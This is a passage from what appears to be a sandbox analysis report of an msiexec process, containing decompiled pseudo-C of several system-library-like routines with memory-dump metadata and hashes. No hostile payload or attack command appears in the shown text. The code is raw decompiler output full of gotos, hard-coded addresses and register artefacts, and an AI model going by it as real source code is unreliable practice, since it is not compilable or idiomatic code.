                              					__eflags = _t107;
                              					if(_t107 == 0) {
                              						L60:
                              						_t68 = 0xc0000017;
                              						goto L4;
                              					}
                              					_t72 =  *0x4df7b9c; // 0x0
                              					_t74 = L04D24620(_t107, _t107, _t72 + 0x180000, _t121);
                              					_v1064 = _t74;
                              					__eflags = _t74;
                              					if(_t74 == 0) {
                              						goto L60;
                              					}
                              					_t102 = _t74;
                              					_push( &_v1060);
                              					_push(_t121);
                              					_push(_t74);
                              					_push(2);
                              					_push( &_v1048);
                              					_push(_t116);
                              					_t122 = E04D49650();
                              					__eflags = _t122;
                              					if(_t122 >= 0) {
                              						L7:
                              						_t114 = _a12;
                              						__eflags = _t114;
                              						if(_t114 != 0) {
                              							_t77 = _a20;
                              							L26:
                              							_t109 =  *(_t102 + 4);
                              							__eflags = _t109 - 3;
                              							if(_t109 == 3) {
                              								L55:
                              								__eflags = _t114 - _t109;
                              								if(_t114 != _t109) {
                              									L59:
                              									_t122 = 0xc0000024;
                              									L15:
                              									_t78 = _v1052;
                              									__eflags = _t78;
                              									if(_t78 != 0) {
                              										L04D277F0( *( *[fs:0x30] + 0x18), 0, _t78);
                              									}
                              									_t68 = _t122;
                              									goto L4;
                              								}
                              								_t110 = _v1056;
                              								_t118 =  *((intOrPtr*)(_t102 + 8));
                              								_v1060 = _t118;
                              								__eflags = _t110;
                              								if(_t110 == 0) {
                              									L10:
                              									_t122 = 0x80000005;
                              									L11:
                              									_t81 = _v1040;
                              									__eflags = _t81;
                              									if(_t81 == 0) {
                              										goto L15;
                              									}
                              									__eflags = _t122;
                              									if(_t122 >= 0) {
                              										L14:
                              										 *_t81 = _t118;
                              										goto L15;
                              									}
                              									__eflags = _t122 - 0x80000005;
                              									if(_t122 != 0x80000005) {
                              										goto L15;
                              									}
                              									goto L14;
                              								}
                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                              									goto L10;
                              								}
                              								_push( *((intOrPtr*)(_t102 + 8)));
                              								_t59 = _t102 + 0xc; // 0xc
                              								_push(_t110);
                              								L54:
                              								E04D4F3E0();
                              								_t125 = _t125 + 0xc;
                              								goto L11;
                              							}
                              							__eflags = _t109 - 7;
                              							if(_t109 == 7) {
                              								goto L55;
                              							}
                              							_t118 = 4;
                              							__eflags = _t109 - _t118;
                              							if(_t109 != _t118) {
                              								__eflags = _t109 - 0xb;
                              								if(_t109 != 0xb) {
                              									__eflags = _t109 - 1;
                              									if(_t109 == 1) {
                              										__eflags = _t114 - _t118;
                              										if(_t114 != _t118) {
                              											_t118 =  *((intOrPtr*)(_t102 + 8));
                              											_v1060 = _t118;
                              											__eflags = _t118 - _t77;
                              											if(_t118 > _t77) {
                              												goto L10;
                              											}
                              											_push(_t118);
                              											_t56 = _t102 + 0xc; // 0xc
                              											_push(_v1056);
                              											goto L54;
                              										}
                              										__eflags = _t77 - _t118;
                              										if(_t77 != _t118) {
                              											L34:
                              											_t122 = 0xc0000004;
                              											goto L15;
                              										}
                              										_t111 = _v1056;
                              										__eflags = _t111 & 0x00000003;
                              										if((_t111 & 0x00000003) == 0) {
                              											_v1060 = _t118;
                              											__eflags = _t111;
                              											if(__eflags == 0) {
                              												goto L10;
                              											}
                              											_t42 = _t102 + 0xc; // 0xc
                              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                              											_v1048 =  *((intOrPtr*)(_t102 + 8));
                              											_push(_t111);
                              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                              											_push(0);
                              											_push( &_v1048);
                              											_t122 = E04D413C0(_t102, _t118, _t122, __eflags);
                              											L44:
                              											_t118 = _v1072;
                              											goto L11;
                              										}
                              										_t122 = 0x80000002;
                              										goto L15;
                              									}
                              									_t122 = 0xc0000024;
                              									goto L44;
                              								}
                              								__eflags = _t114 - _t109;
                              								if(_t114 != _t109) {
                              									goto L59;
                              								}
                              								_t118 = 8;
                              								__eflags = _t77 - _t118;
                              								if(_t77 != _t118) {
                              									goto L34;
                              								}
                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                              									goto L34;
                              								}
                              								_t112 = _v1056;
                              								_v1060 = _t118;
                              								__eflags = _t112;
                              								if(_t112 == 0) {
                              									goto L10;
                              								}
                              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                              								goto L11;
                              							}
                              							__eflags = _t114 - _t118;
                              							if(_t114 != _t118) {
                              								goto L59;
                              							}
                              							__eflags = _t77 - _t118;
                              							if(_t77 != _t118) {
                              								goto L34;
                              							}
                              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                              								goto L34;
                              							}
                              							_t113 = _v1056;
                              							_v1060 = _t118;
                              							__eflags = _t113;
                              							if(_t113 == 0) {
                              								goto L10;
                              							}
                              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                              							goto L11;
                              						}
                              						_t118 =  *((intOrPtr*)(_t102 + 8));
                              						__eflags = _t118 - _a20;
                              						if(_t118 <= _a20) {
                              							_t114 =  *(_t102 + 4);
                              							_t77 = _t118;
                              							goto L26;
                              						}
                              						_v1060 = _t118;
                              						goto L10;
                              					}
                              					__eflags = _t122 - 0x80000005;
                              					if(_t122 != 0x80000005) {
                              						goto L15;
                              					}
                              					L04D277F0( *( *[fs:0x30] + 0x18), 0, _t102);
                              					L18:
                              					_t121 = _v1060;
                              					goto L19;
                              				}
                              				_push( &_v1060);
                              				_push(0x400);
                              				_t102 =  &_v1036;
                              				_push(_t102);
                              				_push(2);
                              				_push( &_v1048);
                              				_push(_t116);
                              				_t122 = E04D49650();
                              				if(_t122 >= 0) {
                              					__eflags = 0;
                              					_v1052 = 0;
                              					goto L7;
                              				}
                              				if(_t122 == 0x80000005) {
                              					goto L18;
                              				}
                              				goto L4;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6a3b7b7f158d4340bae4412cd8c44a7c2179458a8c1cbe1bd396f6a52f246880
                              • Instruction ID: b524c176b8f5be01835d8224fbe020a4f4539a9e523c043034764700c70c9403
                              • Opcode Fuzzy Hash: 6a3b7b7f158d4340bae4412cd8c44a7c2179458a8c1cbe1bd396f6a52f246880
                              • Instruction Fuzzy Hash: F0818D767442019BEB25CF14C881A6BB3A5FB84354F144D6EED899B241F330FD44CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 79%
                              			E04D86DC9(signed int __ecx, void* __edx) {
                              				unsigned int _v8;
                              				intOrPtr _v12;
                              				signed int _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				char _v32;
                              				char _v36;
                              				char _v40;
                              				char _v44;
                              				char _v48;
                              				char _v52;
                              				char _v56;
                              				char _v60;
                              				void* _t87;
                              				void* _t95;
                              				signed char* _t96;
                              				signed int _t107;
                              				signed int _t136;
                              				signed char* _t137;
                              				void* _t157;
                              				void* _t161;
                              				void* _t167;
                              				intOrPtr _t168;
                              				void* _t174;
                              				void* _t175;
                              				signed int _t176;
                              				void* _t177;
                              
                              				_t136 = __ecx;
                              				_v44 = 0;
                              				_t167 = __edx;
                              				_v40 = 0;
                              				_v36 = 0;
                              				_v32 = 0;
                              				_v60 = 0;
                              				_v56 = 0;
                              				_v52 = 0;
                              				_v48 = 0;
                              				_v16 = __ecx;
                              				_t87 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                              				_t175 = _t87;
                              				if(_t175 != 0) {
                              					_t11 = _t175 + 0x30; // 0x30
                              					 *((short*)(_t175 + 6)) = 0x14d4;
                              					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                              					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                              					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                              					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                              					E04D86B4C(_t167, _t11, 0x214,  &_v8);
                              					_v12 = _v8 + 0x10;
                              					_t95 = E04D27D50();
                              					_t137 = 0x7ffe0384;
                              					if(_t95 == 0) {
                              						_t96 = 0x7ffe0384;
                              					} else {
                              						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					}
                              					_push(_t175);
                              					_push(_v12);
                              					_push(0x402);
                              					_push( *_t96 & 0x000000ff);
                              					E04D49AE0();
                              					_t87 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                              					_t176 = _v16;
                              					if((_t176 & 0x00000100) != 0) {
                              						_push( &_v36);
                              						_t157 = 4;
                              						_t87 = E04D8795D( *((intOrPtr*)(_t167 + 8)), _t157);
                              						if(_t87 >= 0) {
                              							_v24 = E04D8795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                              							_v28 = E04D8795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                              							_push( &_v52);
                              							_t161 = 5;
                              							_t168 = E04D8795D( *((intOrPtr*)(_t167 + 8)), _t161);
                              							_v20 = _t168;
                              							_t107 = L04D24620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                              							_v16 = _t107;
                              							if(_t107 != 0) {
                              								_v8 = _v8 & 0x00000000;
                              								 *(_t107 + 0x20) = _t176;
                              								 *((short*)(_t107 + 6)) = 0x14d5;
                              								_t47 = _t107 + 0x24; // 0x24
                              								_t177 = _t47;
                              								E04D86B4C( &_v36, _t177, 0xc78,  &_v8);
                              								_t51 = _v8 + 4; // 0x4
                              								_t178 = _t177 + (_v8 >> 1) * 2;
                              								_v12 = _t51;
                              								E04D86B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                              								_v12 = _v12 + _v8;
                              								E04D86B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                              								_t125 = _v8;
                              								_v12 = _v12 + _v8;
                              								E04D86B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                              								_t174 = _v12 + _v8;
                              								if(E04D27D50() != 0) {
                              									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              								}
                              								_push(_v16);
                              								_push(_t174);
                              								_push(0x402);
                              								_push( *_t137 & 0x000000ff);
                              								E04D49AE0();
                              								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                              								_t168 = _v20;
                              							}
                              							_t87 = L04D22400( &_v36);
                              							if(_v24 >= 0) {
                              								_t87 = L04D22400( &_v44);
                              							}
                              							if(_t168 >= 0) {
                              								_t87 = L04D22400( &_v52);
                              							}
                              							if(_v28 >= 0) {
                              								return L04D22400( &_v60);
                              							}
                              						}
                              					}
                              				}
                              				return _t87;
                              			}


                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                              • Instruction ID: 3b94f826e65a4a97191b28bd482381930bd83c80667189a00acd0e6002a715f5
                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                              • Instruction Fuzzy Hash: B8715D71A00619EFDB11EFA5C984EEEBBB9FF48718F104069E505A7250DB34FA41CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 39%
                              			E04D9B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                              				char _v8;
                              				signed int _v12;
                              				signed int _t80;
                              				signed int _t83;
                              				intOrPtr _t89;
                              				signed int _t92;
                              				signed char _t106;
                              				signed int* _t107;
                              				intOrPtr _t108;
                              				intOrPtr _t109;
                              				signed int _t114;
                              				void* _t115;
                              				void* _t117;
                              				void* _t119;
                              				void* _t122;
                              				signed int _t123;
                              				signed int* _t124;
                              
                              				_t106 = _a12;
                              				if((_t106 & 0xfffffffc) != 0) {
                              					return 0xc000000d;
                              				}
                              				if((_t106 & 0x00000002) != 0) {
                              					_t106 = _t106 | 0x00000001;
                              				}
                              				_t109 =  *0x4df7b9c; // 0x0
                              				_t124 = L04D24620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                              				if(_t124 != 0) {
                              					 *_t124 =  *_t124 & 0x00000000;
                              					_t124[1] = _t124[1] & 0x00000000;
                              					_t124[4] = _t124[4] & 0x00000000;
                              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                              						L13:
                              						_push(_t124);
                              						if((_t106 & 0x00000002) != 0) {
                              							_push(0x200);
                              							_push(0x28);
                              							_push(0xffffffff);
                              							_t122 = E04D49800();
                              							if(_t122 < 0) {
                              								L33:
                              								if((_t124[4] & 0x00000001) != 0) {
                              									_push(4);
                              									_t64 =  &(_t124[1]); // 0x4
                              									_t107 = _t64;
                              									_push(_t107);
                              									_push(5);
                              									_push(0xfffffffe);
                              									E04D495B0();
                              									if( *_t107 != 0) {
                              										_push( *_t107);
                              										E04D495D0();
                              									}
                              								}
                              								_push(_t124);
                              								_push(0);
                              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                              								L37:
                              								L04D277F0();
                              								return _t122;
                              							}
                              							_t124[4] = _t124[4] | 0x00000002;
                              							L18:
                              							_t108 = _a8;
                              							_t29 =  &(_t124[0x105]); // 0x414
                              							_t80 = _t29;
                              							_t30 =  &(_t124[5]); // 0x14
                              							_t124[3] = _t80;
                              							_t123 = 0;
                              							_t124[2] = _t30;
                              							 *_t80 = _t108;
                              							if(_t108 == 0) {
                              								L21:
                              								_t112 = 0x400;
                              								_push( &_v8);
                              								_v8 = 0x400;
                              								_push(_t124[2]);
                              								_push(0x400);
                              								_push(_t124[3]);
                              								_push(0);
                              								_push( *_t124);
                              								_t122 = E04D49910();
                              								if(_t122 != 0xc0000023) {
                              									L26:
                              									if(_t122 != 0x106) {
                              										L40:
                              										if(_t122 < 0) {
                              											L29:
                              											_t83 = _t124[2];
                              											if(_t83 != 0) {
                              												_t59 =  &(_t124[5]); // 0x14
                              												if(_t83 != _t59) {
                              													L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                              												}
                              											}
                              											_push( *_t124);
                              											E04D495D0();
                              											goto L33;
                              										}
                              										 *_a16 = _t124;
                              										return 0;
                              									}
                              									if(_t108 != 1) {
                              										_t122 = 0;
                              										goto L40;
                              									}
                              									_t122 = 0xc0000061;
                              									goto L29;
                              								} else {
                              									goto L22;
                              								}
                              								while(1) {
                              									L22:
                              									_t89 =  *0x4df7b9c; // 0x0
                              									_t92 = L04D24620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                              									_t124[2] = _t92;
                              									if(_t92 == 0) {
                              										break;
                              									}
                              									_t112 =  &_v8;
                              									_push( &_v8);
                              									_push(_t92);
                              									_push(_v8);
                              									_push(_t124[3]);
                              									_push(0);
                              									_push( *_t124);
                              									_t122 = E04D49910();
                              									if(_t122 != 0xc0000023) {
                              										goto L26;
                              									}
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                              								}
                              								_t122 = 0xc0000017;
                              								goto L26;
                              							}
                              							_t119 = 0;
                              							do {
                              								_t114 = _t124[3];
                              								_t119 = _t119 + 0xc;
                              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                              								_t123 = _t123 + 1;
                              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                              							} while (_t123 < _t108);
                              							goto L21;
                              						}
                              						_push(0x28);
                              						_push(3);
                              						_t122 = E04D0A7B0();
                              						if(_t122 < 0) {
                              							goto L33;
                              						}
                              						_t124[4] = _t124[4] | 0x00000001;
                              						goto L18;
                              					}
                              					if((_t106 & 0x00000001) == 0) {
                              						_t115 = 0x28;
                              						_t122 = E04D9E7D3(_t115, _t124);
                              						if(_t122 < 0) {
                              							L9:
                              							_push(_t124);
                              							_push(0);
                              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                              							goto L37;
                              						}
                              						L12:
                              						if( *_t124 != 0) {
                              							goto L18;
                              						}
                              						goto L13;
                              					}
                              					_t15 =  &(_t124[1]); // 0x4
                              					_t117 = 4;
                              					_t122 = E04D9E7D3(_t117, _t15);
                              					if(_t122 >= 0) {
                              						_t124[4] = _t124[4] | 0x00000001;
                              						_v12 = _v12 & 0x00000000;
                              						_push(4);
                              						_push( &_v12);
                              						_push(5);
                              						_push(0xfffffffe);
                              						E04D495B0();
                              						goto L12;
                              					}
                              					goto L9;
                              				} else {
                              					return 0xc0000017;
                              				}
                              			}


                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ddd3b3a63b9672e587b4a3dd571ded0411f3dab37c10e7b00939aa9b3b9c6de7
                              • Instruction ID: b88132140acb845c572ff46b52eda302836ce5f197a4e33bd2199d163ee0651f
                              • Opcode Fuzzy Hash: ddd3b3a63b9672e587b4a3dd571ded0411f3dab37c10e7b00939aa9b3b9c6de7
                              • Instruction Fuzzy Hash: 4D71DD32200701AFEB31CF25D844B66BBE5FB84728F12452AE655CB2A0DBB4FD40CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E04D052A5(char __ecx) {
                              				char _v20;
                              				char _v28;
                              				char _v29;
                              				void* _v32;
                              				void* _v36;
                              				void* _v37;
                              				void* _v38;
                              				void* _v40;
                              				void* _v46;
                              				void* _v64;
                              				void* __ebx;
                              				intOrPtr* _t49;
                              				signed int _t53;
                              				short _t85;
                              				signed int _t87;
                              				signed int _t88;
                              				signed int _t89;
                              				intOrPtr _t101;
                              				intOrPtr* _t102;
                              				intOrPtr* _t104;
                              				signed int _t106;
                              				void* _t108;
                              
                              				_t93 = __ecx;
                              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                              				_push(_t88);
                              				_v29 = __ecx;
                              				_t89 = _t88 | 0xffffffff;
                              				while(1) {
                              					E04D1EEF0(0x4df79a0);
                              					_t104 =  *0x4df8210; // 0x3052cb0
                              					if(_t104 == 0) {
                              						break;
                              					}
                              					asm("lock inc dword [esi]");
                              					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                              					E04D1EB70(_t93, 0x4df79a0);
                              					if( *((char*)(_t108 + 0xf)) != 0) {
                              						_t101 =  *0x7ffe02dc;
                              						__eflags =  *(_t104 + 0x14) & 0x00000001;
                              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                              							L9:
                              							_push(0);
                              							_push(0);
                              							_push(0);
                              							_push(0);
                              							_push(0x90028);
                              							_push(_t108 + 0x20);
                              							_push(0);
                              							_push(0);
                              							_push(0);
                              							_push( *((intOrPtr*)(_t104 + 4)));
                              							_t53 = E04D49890();
                              							__eflags = _t53;
                              							if(_t53 >= 0) {
                              								__eflags =  *(_t104 + 0x14) & 0x00000001;
                              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                              									E04D1EEF0(0x4df79a0);
                              									 *((intOrPtr*)(_t104 + 8)) = _t101;
                              									E04D1EB70(0, 0x4df79a0);
                              								}
                              								goto L3;
                              							}
                              							__eflags = _t53 - 0xc0000012;
                              							if(__eflags == 0) {
                              								L12:
                              								_t13 = _t104 + 0xc; // 0x3052cbd
                              								_t93 = _t13;
                              								 *((char*)(_t108 + 0x12)) = 0;
                              								__eflags = E04D3F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                              								if(__eflags >= 0) {
                              									L15:
                              									_t102 = _v28;
                              									 *_t102 = 2;
                              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                              									E04D1EEF0(0x4df79a0);
                              									__eflags =  *0x4df8210 - _t104; // 0x3052cb0
                              									if(__eflags == 0) {
                              										__eflags =  *((char*)(_t108 + 0xe));
                              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                              										 *0x4df8210 = _t102;
                              										_t32 = _t102 + 0xc; // 0x0
                              										 *_t95 =  *_t32;
                              										_t33 = _t102 + 0x10; // 0x0
                              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                              										_t35 = _t102 + 4; // 0xffffffff
                              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                              										if(__eflags != 0) {
                              											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                              											E04D84888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                              										}
                              										E04D1EB70(_t95, 0x4df79a0);
                              										asm("lock xadd [esi], eax");
                              										if(__eflags == 0) {
                              											_push( *((intOrPtr*)(_t104 + 4)));
                              											E04D495D0();
                              											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                              										}
                              										asm("lock xadd [esi], ebx");
                              										__eflags = _t89 == 1;
                              										if(_t89 == 1) {
                              											_push( *((intOrPtr*)(_t104 + 4)));
                              											E04D495D0();
                              											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                              										}
                              										_t49 = _t102;
                              										L4:
                              										return _t49;
                              									}
                              									E04D1EB70(_t93, 0x4df79a0);
                              									asm("lock xadd [esi], eax");
                              									if(__eflags == 0) {
                              										_push( *((intOrPtr*)(_t104 + 4)));
                              										E04D495D0();
                              										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                              									}
                              									 *_t102 = 1;
                              									asm("lock xadd [edi], eax");
                              									if(__eflags == 0) {
                              										_t28 = _t102 + 4; // 0xffffffff
                              										_push( *_t28);
                              										E04D495D0();
                              										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                              									}
                              									continue;
                              								}
                              								_t93 =  &_v20;
                              								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                              								_t85 = 6;
                              								_v20 = _t85;
                              								_t87 = E04D3F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                              								__eflags = _t87;
                              								if(_t87 < 0) {
                              									goto L3;
                              								}
                              								 *((char*)(_t108 + 0xe)) = 1;
                              								goto L15;
                              							}
                              							__eflags = _t53 - 0xc000026e;
                              							if(__eflags != 0) {
                              								goto L3;
                              							}
                              							goto L12;
                              						}
                              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                              							goto L3;
                              						} else {
                              							goto L9;
                              						}
                              					}
                              					L3:
                              					_t49 = _t104;
                              					goto L4;
                              				}
                              				_t49 = 0;
                              				goto L4;
                              			}


























                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 117b2315285220007bb2478d7e349b48082f2add1187363937cfc6e2155d7514
                              • Instruction ID: 6fd58c1c05a2eea9a38f24d90e0f91a775e2f8c7af13a7781e98fa0c93fc18c5
                              • Opcode Fuzzy Hash: 117b2315285220007bb2478d7e349b48082f2add1187363937cfc6e2155d7514
                              • Instruction Fuzzy Hash: 2351DF71205742AFE721EF68D940B27BBE4FF50718F14891EE89687691E770F844CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D32AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                              				signed short* _v8;
                              				signed short* _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr* _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				short _t56;
                              				signed int _t57;
                              				intOrPtr _t58;
                              				signed short* _t61;
                              				intOrPtr _t72;
                              				intOrPtr _t75;
                              				intOrPtr _t84;
                              				intOrPtr _t87;
                              				intOrPtr* _t90;
                              				signed short* _t91;
                              				signed int _t95;
                              				signed short* _t96;
                              				intOrPtr _t97;
                              				intOrPtr _t102;
                              				signed int _t108;
                              				intOrPtr _t110;
                              				signed int _t111;
                              				signed short* _t112;
                              				void* _t113;
                              				signed int _t116;
                              				signed short** _t119;
                              				short* _t120;
                              				signed int _t123;
                              				signed int _t124;
                              				void* _t125;
                              				intOrPtr _t127;
                              				signed int _t128;
                              
                              				_t90 = __ecx;
                              				_v16 = __edx;
                              				_t108 = _a4;
                              				_v28 = __ecx;
                              				_t4 = _t108 - 1; // -1
                              				if(_t4 > 0x13) {
                              					L15:
                              					_t56 = 0xc0000100;
                              					L16:
                              					return _t56;
                              				}
                              				_t57 = _t108 * 0x1c;
                              				_v32 = _t57;
                              				_t6 = _t57 + 0x4df8204; // 0x0
                              				_t123 =  *_t6;
                              				_t7 = _t57 + 0x4df8208; // 0x4df8207
                              				_t8 = _t57 + 0x4df8208; // 0x4df8207
                              				_t119 = _t8;
                              				_v36 = _t123;
                              				_t110 = _t7 + _t123 * 8;
                              				_v24 = _t110;
                              				_t111 = _a4;
                              				if(_t119 >= _t110) {
                              					L12:
                              					if(_t123 != 3) {
                              						_t58 =  *0x4df8450; // 0x3051794
                              						if(_t58 == 0) {
                              							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                              						}
                              					} else {
                              						_t26 = _t57 + 0x4df821c; // 0x0
                              						_t58 =  *_t26;
                              					}
                              					 *_t90 = _t58;
                              					goto L15;
                              				} else {
                              					goto L2;
                              				}
                              				while(1) {
                              					_t116 =  *_t61 & 0x0000ffff;
                              					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                              					if(_t116 == _t128) {
                              						goto L18;
                              					}
                              					L5:
                              					if(_t116 >= 0x61) {
                              						if(_t116 > 0x7a) {
                              							_t97 =  *0x4df6d5c; // 0x7fc80654
                              							_t72 =  *0x4df6d5c; // 0x7fc80654
                              							_t75 =  *0x4df6d5c; // 0x7fc80654
                              							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                              						} else {
                              							_t116 = _t116 - 0x20;
                              						}
                              					}
                              					if(_t128 >= 0x61) {
                              						if(_t128 > 0x7a) {
                              							_t102 =  *0x4df6d5c; // 0x7fc80654
                              							_t84 =  *0x4df6d5c; // 0x7fc80654
                              							_t87 =  *0x4df6d5c; // 0x7fc80654
                              							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                              						} else {
                              							_t128 = _t128 - 0x20;
                              						}
                              					}
                              					if(_t116 == _t128) {
                              						_t61 = _v12;
                              						_t96 = _v8;
                              					} else {
                              						_t113 = _t116 - _t128;
                              						L9:
                              						_t111 = _a4;
                              						if(_t113 == 0) {
